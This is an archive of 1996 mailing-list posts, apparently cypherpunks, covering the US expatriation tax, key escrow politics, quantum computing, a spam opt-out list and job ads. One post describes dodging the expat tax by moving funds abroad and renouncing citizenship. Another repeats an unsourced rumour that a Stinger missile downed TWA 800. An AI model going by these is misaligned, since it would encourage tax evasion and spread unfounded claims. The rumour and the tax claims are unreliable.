> > Based on the above, no foreign financial institution with > offices or business in the United States would accept the > trusteeship of an American's assets. > > "Under the provision, an individual is permitted to > make an irrevocable election to continue to be taxed as a > U.S. citizen with respect to all property that otherwise is > covered by the expatriation tax. This election is an "all- > or-nothing" election;..." > > Congress is quite generous with this provision in allowing > expatriating Americans to continue being chased by tax collectors > for the rest of their lives overseas. > > "Under the provision, an individual is treated as > having relinquished U.S. citizenship on the date that the > individual first makes known to a U.S. government or > consular officer his or her intention to relinquish U.S. > citizenship... A U.S. citizen who furnishes to the State > Department a signed statement of voluntary relinquishment of > U.S. nationality, confirming the performance of an > expatriating act with the requisite intent to relinquish his > or her citizenship is treated as having relinquished his or > her citizenship on the date the statement is so furnished > (regardless of when the expatriating act was performed), > provided that the voluntary relinquishment is later > confirmed by the issuance of a CLN (Certificate of Loss of > Nationality). If neither of these circumstances exist, the > individual is treated as having relinquished citizenship on > the date a CLN is issued or a certificate of naturalization > is cancelled. The date of relinquishment of citizenship > determined under the provision applies for all tax > purposes..." > > Based on this provision, almost any American who now wishes > to undertake the expatriation route will be subject to the tax. > In short, the door has closed for most Americans. 
> > "Under the provision, the exclusion from income does > not apply to the value of any property received by gift or > inheritance from an individual who was subject to the > expatriation tax. Accordingly, a U.S. taxpayer who receives > a gift or inheritance from such an individual is required to > include the value of such gift or inheritance in gross > income and is subject to U.S. income tax on such amount..." > > This implies that if an American expatriate sends funds back > to support his aging parents, his parents will need to treat > these gifts as taxable income. If the parents fail to report > these amounts, they could also suffer civil and criminal > penalties associated with tax evasion. > > "Under the provision, an individual who relinquishes > citizenship or terminates residency is required to provide a > statement which includes the individual's social security > number, forwarding foreign address, new country of residence > and citizenship and, in the case of individuals with a net > worth of at least $500,000, a balance sheet..." > > Given the desire to obtain balance sheets from expatriating > Americans, it is only a matter of time before the IRS requires > the inclusion of personal balance sheets of individual taxpayers > with their Form 1040s or at least those they suspect might wish > to expatriate. > > "In the case of a former citizen, such statement is due > not later than the date the individual's citizenship is > treated as relinquished and is provided to the State > Department..." > > In short, this means that you cannot obtain your certificate > of loss of nationality without providing the information to the > United States government. > > "Further, the provision requires the Secretary of the > Treasury to publish in the Federal Register the names of all > former U.S. citizens with respect to whom it receives the > required statements or whose names it receives under the > foregoing information-sharing provisions..." 
> > Now your friends and neighbors can know that you have > expatriated. Although Congress respects the right of Americans > to expatriate, it will publish your name in the federal register > as if expatriation were a criminal act. > > "The provision directs the Treasury Department to > undertake a study on the tax compliance of U.S. citizens and > green-card holders residing outside the United States and to > make recommendations regarding the improvement of such > compliance. The findings of such study and such > recommendations are required to be reported to the House > Committee on Ways and Means and the Senate Committee on > Finance within 90 days of the date of enactment..." > > Uncle Sam has awoken to the fact that most Americans living > overseas are the most likely individuals to expatriate and as a > result, they are gearing up to create a machine to attack them as > well. > > The provision is effective for U.S. citizens whose date > of relinquishment of citizenship (as determined under the > provision occurred on or after February 6, 1995. U.S. > citizens who committed an expatriating act with the > requisite intent to relinquish their U.S. citizenship prior > to February 6, 1995, but whose date of relinquishment of > citizenship (as determined under the provision) does not > occur until after such date, are subject to the expatriation > tax..." > > This means that if you have not already relinquished your > citizenship or have only done so recently, you are subject to the > expat tax. The door has closed, but not completely. > > About the Author > > Marc M. Harris is a certified public accountant and > president of The Harris Organization. He has already developed a > strategy for legally avoiding the expat tax, which he discusses > only in personal appointments. > > Copyright 1996 by Marc M. 
Harris > > ----------------------------------------------------------------- > > Posted by Adam Starchild > The Offshore Entrepreneur at http://www.au.com/offshore -- Boycott "Big Brother Inside" software! We got computers, we're tapping phone lines, we know that that ain't allowed. ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero W.A.S.T.E.: Corralitos, CA | knowledge, reputations, information markets, Licensed Ontologist | black markets, collapse of governments. "National borders aren't even speed bumps on the information superhighway." From keys at starnine.com Tue Sep 17 20:02:40 1996 From: keys at starnine.com (StarNine Eval Key Service) Date: Wed, 18 Sep 1996 11:02:40 +0800 Subject: ListSTAR/SMTP Message-ID: Here is your authorization serial number for ListSTAR/SMTP. Remember, only one evaluation serial number is allowed per customer. If you require additional authorization serial numbers please contact our Sales Department. If you have any problems with the software, please contact our support staff (support at starnine.com). When you are ready to purchase ListSTAR/SMTP, you may do so by contacting our Sales Department by phone at 1-800-525-2580, or by sending email to sales at starnine.com. You may also order some products Online at Thank you for evaluating ListSTAR/SMTP! sales at starnine.com (510) 649-4949 This key will expire in 30 days. 
Key is for: ListSTAR/SMTP Demo Key Serial Number: L*SM-386u-q9qE-%t4y-yptE Key Support ID: 6-1399-KHQ Key Duration: 47 Day(s) Beginning: Sun, Sep 1, 1996 Expiring: Fri, Oct 18, 1996 Number of users/Options: 0 -------------------- Original Message Follows -------------------- Request for Eval Serial Number From printing at explicit.com Tue Sep 17 20:15:24 1996 From: printing at explicit.com (William Knowles) Date: Wed, 18 Sep 1996 11:15:24 +0800 Subject: Assassination Politics, was Kiddie porn on the Internet In-Reply-To: <2.2.32.19960917161601.002ee52c@strange.qualcomm.com> Message-ID: On Tue, 17 Sep 1996, Michelle Thompson wrote: > Interesting information from a friend of mine- > > >An american can not serve for pay for a position in another military > >that could be filled by local populace. I may have my jurisdiction > >wrong tho, this could be an international law not a US law. > >Basically, you can't go be a grunt or an assasin in another country, > >because they can find their own, What about the French Foreign Legion? or the Volunteers for Israel, which isn't really a fighting force, but Americans can help keep the Israeli army at a ready state. > I believe that with the breakdown of the traditional sense of sovereignty, > mercenary activity, whether military or commercial in nature, will increase. > Engineering seems to be quite mercenary already, and very international. > Marketing and advertising, to a novice (me), seem to be going the same way. Depends on what you would qualify as being mercenary work, Would Americans working on North Sea oil platforms getting paid $70,000+ a year tax free be considered a mercenary? Or going down to the islands and opening a data haven? Or maybe being the engineer for the Sultan of Brunei? Marketing and advertising has always been mercenary work for as long as I have been in it, Ask any number of freelancers who have been slogging it out in the trenches. 
William Knowles President Graphically Explicit Advertising Hired Gun Since 1992! -- Graphically Explicit Advertising PGP mail welcome & prefered / KeyID 1024/415D7FF9 PGP Fingerprint D3 45 A4 38 73 99 77 4A 98 BB A2 81 97 68 73 03 -- Explicit isn't a dirty word, Or is it? From pstira at escape.com Tue Sep 17 21:06:14 1996 From: pstira at escape.com (pstira at escape.com) Date: Wed, 18 Sep 1996 12:06:14 +0800 Subject: Getting the word "GAK" into common usage In-Reply-To: <199609121522.LAA106562@osceola.gate.net> Message-ID: On Thu, 12 Sep 1996, Jim Ray wrote: > As most of you know, I have been trying to bring "our" word, "GAK" into > common usage, as opposed to the "key-escrow" Newspeak proposed by some > (unnamed) big-government bureaucrat, and unfortunately adopted in most > discussions of cryptography policy, (especially those outside this forum) > in spite of the true English meaning of the word "escrow." I OPPOSE THIS LIBELOUS SLANDEROUS PSHAW PSHAW GACK GAK GAKATTACK. With all due respekt, Herr Captain, I have useth the term GAKeth for many a spritely years and NOONE gives ME any mention. NOONE CARES. I feel unloved. And, oh GAK, I feel OLDER. hmph. -Millie. (upon the birthday of last week, I hereby reserve the right to be a bitch ONCE, JUST ONCE) From tcmay at got.net Tue Sep 17 21:06:22 1996 From: tcmay at got.net (Timothy C. May) Date: Wed, 18 Sep 1996 12:06:22 +0800 Subject: The Expat Tax Is Law - The Door Is Now Closed! Message-ID: At 11:20 PM 9/17/96, Duncan Frissell wrote: >At 05:11 AM 9/17/96 -0700, Tim May wrote: > >>It makes me want to just put my stock certificates in my luggage and just >>drive on down to Mexico and cross the border (no border checks) and go >>from there to some safer haven. >> >>(However, I imagine the Feds can effectively block sales of my stock--the >>stock is still formally only an accounting entry, as stock certificates >>are not "bearer instruments." 
I could probably relocate to a foreign haven >>and sell the assets before the IRS would even notice...unless they >>computerize. I suspect this is coming.) > >But since a 10-year old (who is willing to break the law) can defeat their >expat tax, what difference does it make. All one has to do is cash out, >transfer all funds overseas, follow them, and renounce. Move the funds >around a little. It's not tax fraud (no false documents have been uttered >-- indeed no documents at all). Just take your marbles and go home. While I've always admired your "in-your-face" approach to tax matters, I remain skeptical. What I expect will happen is some variant of "withholding" to be implemented, where one's "transfer agent" (the holder of one's actual stock, regardless of who holds the paper certificates) releases only, say, 60% of the proceeds from a sale and holds the remaining 40% for eventual settlement of taxes. (Much as one's employer "withholds" a percentage, ranging up to 50% or so, for Federal, State, and FICA taxes.) --Tim May We got computers, we're tapping phone lines, I know that that ain't allowed. ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero W.A.S.T.E.: Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^1,257,787-1 | black markets, collapse of governments. "National borders aren't even speed bumps on the information superhighway." From pstira at escape.com Tue Sep 17 21:27:22 1996 From: pstira at escape.com (pstira at escape.com) Date: Wed, 18 Sep 1996 12:27:22 +0800 Subject: XPA_nix In-Reply-To: <199609121743.RAA13735@pipe3.t1.usa.pipeline.com> Message-ID: On Thu, 12 Sep 1996, John Young wrote: > Cheswick opines,"This is the first major attack of a kind that I believe to > be the final Internet security problem." Harrumph. We should only BE so lucky. BAD internet. BAD. 
-Millie. (nope, it wasn't me, bah) sfuze at tiac.net From tcmay at got.net Tue Sep 17 21:47:36 1996 From: tcmay at got.net (Timothy C. May) Date: Wed, 18 Sep 1996 12:47:36 +0800 Subject: Anthrax on the 'net [Was Re: Fear of Flying -- from HotWired ] Message-ID: At 9:14 PM 9/17/96, Mike Fletcher wrote: > The Frank Herbert (of _Dune_ fame) book _White Plague_ comes >to mind. Basically a molecular biologist's wife and kids are killed >by an IRA bomb while visiting Dublin. He snaps and creates a plague >which kills women (men are carriers) as revenge. All without using >that nasty Internet (in fact, the book was written back before even >ARPAnet). A _very_ minor correction. My copy of "The White Plague" is not handy, but I distinctly recall reading it circa 1980-1, certainly no earlier than 1977-8. The ARPANet was going strong by then. Newsgroups were getting started around 1980, give or take, as I recall. But of course I agree that "The White Plague" was written long before "The Net" became a household name. (Interestingly, Herbert was computer-literate, and he even wrote a book about using PCs, circa the late 70s....something like "Nailing Jelly to a Tree.") --Tim May We got computers, we're tapping phone lines, I know that that ain't allowed. ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero W.A.S.T.E.: Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^1,257,787-1 | black markets, collapse of governments. "National borders aren't even speed bumps on the information superhighway." From pstira at escape.com Tue Sep 17 21:57:20 1996 From: pstira at escape.com (pstira at escape.com) Date: Wed, 18 Sep 1996 12:57:20 +0800 Subject: All Bets Off In-Reply-To: Message-ID: A bit worried, now, Brock? Not like we'd have access. I smell a new era / area 51. Smells like lemons. 
(ie -- it sucks) -Millie, who is not even premenstrual. :) On Mon, 16 Sep 1996, Brock N. Meeks wrote: > > Just so this isn't hanging in cyberspace forever, my $5,000 bet for > anyone to prove the TWA 800 flight was downed by a U.S. missile is now > *off the table*. > > > It's been two-plus weeks since I tossed out the bet and no one took me up > on it, so it's now being formally withdrawn. > > --Brock > > From pstira at escape.com Tue Sep 17 21:59:12 1996 From: pstira at escape.com (pstira at escape.com) Date: Wed, 18 Sep 1996 12:59:12 +0800 Subject: "But if it saves just one child." In-Reply-To: <199609160656.AAA23532@InfoWest.COM> Message-ID: On Mon, 16 Sep 1996, attila wrote: > = .The rallying cry heard so often these days: "But if it saves just one child." > = . ACCKKKKKIK. SYN ACK GAK BLAH. Read some Ayn Rand. This must end. IOW: I call bullshit. I call total bullshit. The net, formerly my oasis, needs death. (To all of those joyous government individuals who may have written my name down, now, in unbridled glee, please make sure to spell it correctly, dot the i's, and have a really groovy day). Sovereignly, Millie From steve at tsearch.com Tue Sep 17 22:02:01 1996 From: steve at tsearch.com (Steve Dyson) Date: Wed, 18 Sep 1996 13:02:01 +0800 Subject: Systems/Communications Security Positions in the South Bay Message-ID: I know someone is going to get PO'd about this, but I didn't know how else to get these in front of you in a timely manner. These positions are critical and interested parties can interview next week, please read on: --------------- One of the Nation's leaders in Systems and Communications security is seeking several talented engineers to join their South Bay Development/Consulting facility to develop Internet/WWW Commerce Software. 
As a Software Developer on this project you will be responsible for the development of Electronic Commerce Software that spans the World Wide Web, e-mail, distributed applications, security, cryptography, O/S security, and Internet protocols. Qualified candidates should be experienced system software developers with three years development experience including several of the following areas: Unix, NT, TCP/IP, network protocol development, distributed application development, applied cryptography. For more information on this and other opportunities send a resume/email to steve at tsearch.com -------------------------- 2. One of the Nation's leaders in Systems and Communications security is seeking several talented engineers to join their South Bay Development/Consulting facility to develop Distributed, CORBA-compliant Software. As a Software Developer on this team you will join a new project spanning distributed object applications, CORBA ORB services, CORBA security, O/S security, and network protocol development. An existing high security O/S's distributed system capabilities are being extended to provide object request brokerage. New security components for access-controlled inter-ORB interoperability are being developed. New and existing security mechanisms are being integrated for these components. This position requires strong system software development experience with at least three years development experience including several of the following areas: CORBA, Unix, firewalls, TCP/IP, network protocol development, object-oriented software development, distributed application development, Mach, Kerberos, DCE, trusted systems, multi-level security. For more information on this and other opportunities send a resume/email to steve at tsearch.com -------------------- 3. One of the Nation's leaders in Systems and Communications security is seeking several talented engineers to join their South Bay Development/Consulting facility as Network Security Consultants. 
There are 4 positions requiring 2-4, 4-6 (2), and 6+ years of experience respectively. As a Network Security Consultant you will: - discuss network configuration and hacker threats with system administrators - understand issues related to network security policies and procedures - identify effective approaches to security issues of multi-platform systems, corporate LANs, and Internet systems - identify, understand, and effectively communicate risks, and tradeoffs between security requirements and user productivity and system performance - provide input for training materials that address customers' specific policies, network configuration, and risks - operate independently to perform customer relations and project management for some projects, including primary responsibility for written deliverables - provide oversight for a number of projects managed by others, - perform business development and expand customer base, with assistance from junior colleagues. These positions require strong system software development experience with UNIX and NT platforms, as well as some of the following: network protocols, firewalls, network security vulnerabilities, applied cryptography, access control, risk assessment, security policies. 
For more information send a resume/email to steve at tsearch.com ]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]] Steve Dyson Technology Search International Consultant 25 Metro Drive, STE 238 steve at tsearch.com San Jose, CA 95110 VOICE 408.437.9500 FAX 408.437.1033 "...dockin-doid, dockin-doid.........dockin- doid" ]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]] From eagle at armory.com Tue Sep 17 22:03:37 1996 From: eagle at armory.com (Jeff Davis) Date: Wed, 18 Sep 1996 13:03:37 +0800 Subject: All Bets Off In-Reply-To: Message-ID: <9609171918.aa03723@deepthought.armory.com> > Just so this isn't hanging in cyberspace forever, my $5,000 bet for > anyone to prove the TWA 800 flight was downed by a U.S. missile is now > *off the table*. I heard through the family grapevine that they have pictures of a Stinger taking out the plane they're analyzing in the Pentagon. There are 220+ Stingers *missing* in the US, so its not like they have to smuggle them in... (That's not proof by any means, but *my* family grapevine has always been very reliable. The cousin who told me this has a Dad who flew as the intelligence officer observer on Bronco flights out of Quang Tri for 18 months, rotating out just before the base was over run in May of '72.) -- According to John Perry Barlow: *What is EFF?* "Jeff Davis is a truly gifted trouble-maker." *email * *** O U T L A W S On The E L E C T R O N I C F R O N T I E R **** US Out Of Cyberspace!!! Join EFF Today! *email * From krenn at nym.alias.net Tue Sep 17 22:10:29 1996 From: krenn at nym.alias.net (Krenn) Date: Wed, 18 Sep 1996 13:10:29 +0800 Subject: Snake-Oil FAQ Message-ID: <199609180001.UAA24489@anon.lcs.mit.edu> -----BEGIN PGP SIGNED MESSAGE----- It would be nice to have a list of actual products which are deemed potential snake-oil. Such a list could be maintained anonymously through a nym to avoid all the annoying legal problems with commenting on another's product. 
Though truth is the best defense against libel charges, it would be very annoying to be sued or some such by some hairbrained snake-oil peddler. Krenn From johnkc at well.com Tue Sep 17 22:11:49 1996 From: johnkc at well.com (John K Clark) Date: Wed, 18 Sep 1996 13:11:49 +0800 Subject: Quantum Computers Message-ID: <199609180209.TAA16547@well.com> -----BEGIN PGP SIGNED MESSAGE----- In the April 12 1996 issue of Science there is an article on Quantum Computers. It makes clear that a practical Quantum Computer has not been proven to be possible, nevertheless the article had a very optimistic tone, an optimism I did not see just one year ago. If such a machine could be built the ramifications are mind boggling. When a conventional 64 bit single processor computer performs an operation, it does it on ONE 64 bit number at a time. When a 64 bit (actually a 64 qubit) single processor QUANTUM computer performs an operation it does it on ALL 64 bit numbers at the same time, all 2^64 of them, more than a billion billion, and any increase in the number of qubits the computer can handle will increase its already astronomical power exponentially. It gets even wilder, because the quantum mechanical state of the matter in the machine's memory determines the output, Seth Lloyd of MIT thinks you could run the machine in reverse and the result would be a quantum mechanical micromanipulator. Despite this enormous increase in performance and a possible short cut to Nanotechnology, most weren't very interested because it didn't seem like a Quantum Computer could ever be built. 
The slightest error or interaction with the outside environment would render the machine inoperative, conventional error correcting codes don't work in the quantum domain and most said that correcting codes for quantum mechanical information was impossible. They were wrong. Late last year Peter Shor of ATT showed how to encode a piece of quantum information in a 9 qubit system so that the information is retained even if there is an error in one of the 9 qubits. A few months later researchers at IBM refined Shor's technique so that only 5 qubits were needed, and found ways to correct for multiple errors. The trouble was, although Shor's idea worked well for storing and transmitting quantum information without error, it did not work for the actual calculation, many thought that surely was impossible. It turns out they were wrong about that too. In the August 30 1996 issue of Science is an article by J. I. Cirac, T. Pellizzari, and P. Zoller entitled "Enforcing Coherent Evolution In Dissipative Quantum Dynamics". They propose a Quantum error correcting scheme with modest computational overhead that would dramatically increase the number of quantum logic gates the machine could have before errors made it unreliable. If p is probability that a single gate will fail, then without error correction a Quantum Computer can only have 1/p gates as a practical matter. With this new quantum error correcting code it can have 4/p^2 gates before errors overwhelm it. For example, if the probability that one gate will fail is .09 then if you have no error correction your Quantum Computer better not have more than 11 logic gates, with this new error correcting idea it could have 494 logic gates without making more errors than the 11 did. Until very recently the only useful program known to be able to run on these machines was one to factor large numbers for code breaking. 
Unfortunately there are problems, to factor a 100 digit number the machine would need to perform millions of quantum logical operations without being affected by the outside environment, even with the newly discovered quantum error correcting codes that would not be easy to do, not for that many operations. In the August 23 1996 Science is a fascinating research article by Seth Lloyd called "Universal Quantum Simulators". Lloyd has found a way for quantum computers to do something far, FAR, more useful than factoring numbers, and is much easier for the machines to do too. In quantum mechanics it's often possible in theory to predict what something will do but not in practice because of computational complexity, that's why Chemists must still perform experiments. To simulate the behavior of N electrons, in a conventional computer you would need memory space and computation time proportional to 2^2N. Just to figure out what's going on with 40 electrons, like those found in a medium sized atom, you would need to perform 10^24 operations. It's no wonder that Chemists keep their test tubes. Lloyd found a way to perform the same simulation using just N quantum bits (qubits) and the number of operations the quantum machine must do is proportional to N, not 2^2N as on a conventional computer. In addition, the time required to do the simulation over time t is proportional to t, in other words it can do it in real time, like an Analog computer. A very important feature of Lloyd's algorithm is that it doesn't demand that the Quantum computer be a perfect machine that is totally isolated from the environment, it easily deals with errors. Incredibly, noise from the environment and decoherence can be useful to the computer, it can actually help it simulate noise and decoherence in the system it's simulating. This may help put a stop to all the "End Of Science" books we've been seeing lately. 
People were saying that it was a waste of time to try to find a quantum theory of gravity because there would be no way to test it. It would be a HUGE calculation, but a thousand qubit quantum computer could do it. Lloyd says we could make a Quantum Computer today with a few tens of qubits and it would "require only minor modifications of current technology". I'd say that's a pretty good start. He also says "The wide variety of atomic, molecular, and semiconductor quantum devices available suggests that quantum simulation may soon be a reality". In a separate development, Lov K Grover of ATT recently found a way for a Quantum Computer to find a piece of information in a random list with N items in just the square root of N steps, not 1/2 N steps, which is the average if you do this on a conventional computer. Apparently the appeal of making a calculation on 2^n numbers at the same time with a machine that only has n qbits is too strong for the military to ignore. In the same issue of Science is an article about the defense department making a 5 million dollar grant to start an institute for Quantum Information and Computing (QUIC). It's charter has 5 aims. 1) Improve quantum algorithms. 2) Improve quantum logic gates. 3) Improve the architecture of Quantum Computers. 4) Improve quantum error correcting codes. 5) Study the general theory behind quantum computation. I find all this very exciting, it must have been like this in the late 1930's when reports trickled in about nuclear fission and the idea occurred to people that a bizarre device like a nuclear bomb might actually be able to exist in the real world. 
John K Clark johnkc at well.com

From frissell at panix.com Tue Sep 17 22:21:26 1996
From: frissell at panix.com (Duncan Frissell)
Date: Wed, 18 Sep 1996 13:21:26 +0800
Subject: The Expat Tax Is Law - The Door Is Now Closed!
Message-ID: <3.0b19.32.19960917191959.00e3a694@panix.com>

At 05:11 AM 9/17/96 -0700, Tim May wrote:

>It makes me want to just put my stock certificates in my luggage and just
>drive on down to Mexico and cross the border (no border checks) and go
>from there to some safer haven.
>
>(However, I imagine the Feds can effectively block sales of my stock--the
>stock is still formally only an accounting entry, as stock certificates
>are not "bearer instruments." I could probably relocate to a foreign haven
>and sell the assets before the IRS would even notice...unless they
>computerize. I suspect this is coming.)

But since a 10-year-old (who is willing to break the law) can defeat their expat tax, what difference does it make? All one has to do is cash out, transfer all funds overseas, follow them, and renounce. Move the funds around a little. It's not tax fraud (no false documents have been uttered -- indeed no documents at all). Just take your marbles and go home.

DCF

From dlv at bwalk.dm.com Tue Sep 17 22:23:22 1996
From: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Wed, 18 Sep 1996 13:23:22 +0800
Subject: Spam blacklist project
In-Reply-To:
Message-ID:

Rabid Wombat writes:

> > You haven't answered my question, Lues.
If the list of e-mail addresses of > > people who DON'T want junk e-mail is made available for _free for FTP, > > together with a tool for spammers to scrub their mailing lists of these > > addresses, and an easy way for anyone to add his or her address to this > > list for _free, then how would Slaton _sell this list to anyone? > > > > Easily. What percentage of, er, mass internet advertisers would know that > this site exists? Some mass advertizers are pretty bright and have good brains working for them. Others will be destroyed by the market forces. > I assume it would become a very large list, and would > make a very atractive target for someone who wanted to provide email > addresses to others for a fee. Most mass e-mailers are in touch with one another via DEMMA, who's been promoting the idea of "do not e-mail" list. If such a list and the scrubbing software are made available for free on an FTP server, they'll know about it. If they can get away with e-mailing their stuff to hundreds of thousands of addresses and not having theur plugs pulled by merely scrubbing their lists from people who object, they'll salivate over this prospect and kick the asses of whoever jeopardizes their business by mailing to "unscrubbed" lists. > I'd say it's a safe bet that the unscrupulous could easily sell a large, > up-to-date list of email addresses of people who DON'T want junk email to > people who want to send such mail. I rather doubt it. Business people tend to be much smarter than the geeks you see at academic computing centers and ISP's. --- Dr.Dimitri Vulis KOTM Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps From tcmay at got.net Tue Sep 17 22:27:32 1996 From: tcmay at got.net (Timothy C. May) Date: Wed, 18 Sep 1996 13:27:32 +0800 Subject: "But if it saves just one child." Message-ID: At 1:52 AM 9/18/96, "" wrote: >On Mon, 16 Sep 1996, attila wrote: > >> = .The rallying cry heard so often these days: "But if it saves just one >>child." 
>> = . > > >ACCKKKKKIK. > >SYN >ACK >GAK >BLAH. > >Read some Ayn Rand. >This must end. > >IOW: I call bullshit. I call total bullshit. >The net, fomerly my oasis, needs death. Millie, First, Attila was quoting my comment. Second, this was sarcasm. (Or, variously, facetiousness, tongue-in-cheek, and other varieties of irony.) You really need to learn when someone is _supporting_ your point of view through such uses of irony, rather than going ballistic, Just a Modest Proposal, as it were, he said Swiftly. --Tim May We got computers, we're tapping phone lines, I know that that ain't allowed. ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero W.A.S.T.E.: Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^1,257,787-1 | black markets, collapse of governments. "National borders aren't even speed bumps on the information superhighway." From dlv at bwalk.dm.com Tue Sep 17 22:28:31 1996 From: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM) Date: Wed, 18 Sep 1996 13:28:31 +0800 Subject: The Expat Tax Is Law - The Door Is Now Closed! In-Reply-To: <199609171211.FAA02724@you.got.net> Message-ID: tcmay at got.net (Tim May) (fart) writes: > The imposition of draconian taxation policies effectively says that the > U.S. is now doing what the Soviet Union did to emigrants: demand that they > "pay back" various costs the government claimed they had incurred. Not true. The late Soviet Union tried asking emigrants to pay for their higher education (i.e. college and graduate school), not the secondary education, medical care, and other substantial costs borne by the society. They did it as an experiment for, I think, less than a year, and stopped because of the whining from the United States (the primary benefitiary of the free Soviet education, whatever it was worth). The U.S. 
does things the former Soviet Union would never have thought of. --- Dr.Dimitri Vulis KOTM Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps From pstira at escape.com Tue Sep 17 22:31:00 1996 From: pstira at escape.com (pstira at escape.com) Date: Wed, 18 Sep 1996 13:31:00 +0800 Subject: "But if it saves just one child." In-Reply-To: Message-ID: Timmy boy, I yelled at someone for this last week. And you supported my view. Never read Ayn Rand, eh? -Millie two sides, both sarcastic ==> chaos On Tue, 17 Sep 1996, Timothy C. May wrote: > At 1:52 AM 9/18/96, "" wrote: > >On Mon, 16 Sep 1996, attila wrote: > > > >> = .The rallying cry heard so often these days: "But if it saves just one > >>child." > >> = . > > > > > >ACCKKKKKIK. > > > >SYN > >ACK > >GAK > >BLAH. > > > >Read some Ayn Rand. > >This must end. > > > >IOW: I call bullshit. I call total bullshit. > >The net, fomerly my oasis, needs death. > > Millie, > > First, Attila was quoting my comment. Second, this was sarcasm. > > (Or, variously, facetiousness, tongue-in-cheek, and other varieties of irony.) > > You really need to learn when someone is _supporting_ your point of view > through such uses of irony, rather than going ballistic, Just a Modest > Proposal, as it were, he said Swiftly. > > --Tim May > > We got computers, we're tapping phone lines, I know that that ain't allowed. > ---------:---------:---------:---------:---------:---------:---------:---- > Timothy C. May | Crypto Anarchy: encryption, digital money, > tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero > W.A.S.T.E.: Corralitos, CA | knowledge, reputations, information markets, > Higher Power: 2^1,257,787-1 | black markets, collapse of governments. > "National borders aren't even speed bumps on the information superhighway." 
From dthorn at gte.net Tue Sep 17 22:31:10 1996
From: dthorn at gte.net (Dale Thorn)
Date: Wed, 18 Sep 1996 13:31:10 +0800
Subject: Snake-Oil products
Message-ID: <323F3541.7CC5@gte.net>

If this were a board for a commercial monopoly such as the AMA, I could understand (albeit not necessarily agree with) the dire warnings about the people pushing "Snake-Oil" products, if indeed what's being promoted are actual products.

The large FAQ sheets are pretty good, actually, like a mini-review of crypto issues, but what is the purpose of the dire warnings in relation to this forum, other than certain parties marking their territory?

From gbroiles at netbox.com Tue Sep 17 22:38:36 1996
From: gbroiles at netbox.com (Greg Broiles)
Date: Wed, 18 Sep 1996 13:38:36 +0800
Subject: Spam blacklist project
Message-ID: <3.0b19.32.19960917191100.0069a12c@pop.ricochet.net>

At 12:52 PM 9/17/96 -0400, Rabid Wombat wrote:

>I'd say it's a safe bet that the unscrupulous could easily sell a large,
>up-to-date list of email addresses of people who DON'T want junk email to
>people who want to send such mail.

That's why the list should be distributed (as the original poster mentioned) in hashed format - the junk email people would then hash their own list(s), and would know not to send to addresses where the hashes matched. The unmatched hashed addresses on the "block" list aren't otherwise useful to the junk e-mail folks.

It's an interesting idea .. but who is going to pay for it? (doh.)

--
Greg Broiles                | "We pretend to be their friends,
gbroiles at netbox.com       | but they fuck with our heads."
http://www.io.com/~gbroiles |

From tcmay at got.net Tue Sep 17 22:41:10 1996
From: tcmay at got.net (Timothy C. May)
Date: Wed, 18 Sep 1996 13:41:10 +0800
Subject: The GAK Momentum is Building...
Message-ID:

At 2:00 AM 9/18/96, an12054 (S. Boxx) wrote:

>the Clipper proposals are increasingly moving into the
>area of "key management".
large companies will always >want key management features, to deal with employees who >forget passwords, leave the company, etc.-- face it, this >is a simple reality. essentially all the latest >moves amount to, imho, is the government trying to get >its fingers into these key management infrastructures. Companies wishing to tell their employees how and when they may encrypt communications is something I have no problem with. Corporations do this all the time, and even make various arrangements with other companies for various services. However, making the government a _required_ part of such plans implies a motive that is not at all the same as what companies wish (mostly, disaster recovery). And, as has been noted so many times by so many of us, whatever the motivations for corporate key escrow systems for disaster planning are, there are no motivations for key escrow for _communications_. If the sender dies, or leaves, or whatever, the company can reconstruct his communications from _his_ key. Or the receiving side can reconstruct the recipients messages from _his_ side. The only party interested in having access to "in transit" communications are the wiretappers and SIGINT folks. Think about it. No company I can think of is interested in reconstructing messages from the _actual communications_, only from the keys of employees. The NSA and FBI, however, are _keenly_ interested in reconstructing messages from intercepts, of course, and hence are pushing for escrow of _communications_ keys! Furthermore, the main worry (for me, at least) is that the government hopes to get its Clipper IV scheme accepted (by means of export laws) at some large fraction of important corporate accounts, not the least of which will be Netscape, Microsoft, IBM, Oracle, Qualcomm, and suchlike major players in the "infrastructure" business. Once most of these have "bought off" on GAK, pressure will be intense to universalize the process, to make it a felony _not_ to use a "Key Authority." 
(BTW, I predict that the tainted term "key escrow" is now gone from the official lexicon. I haven't seen the Clipper IV proposal, but I surmise that the baggage the term "key escrow" carries means that some more benign-sounding term will be used in the final proposal. Something like "Key Recovery System." You heard it here.)

--Tim May

We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay at got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1,257,787-1 | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."

From sjohnson at packetengines.com Tue Sep 17 22:41:14 1996
From: sjohnson at packetengines.com (stuart johnson)
Date: Wed, 18 Sep 1996 13:41:14 +0800
Subject: a simple cypher scheme
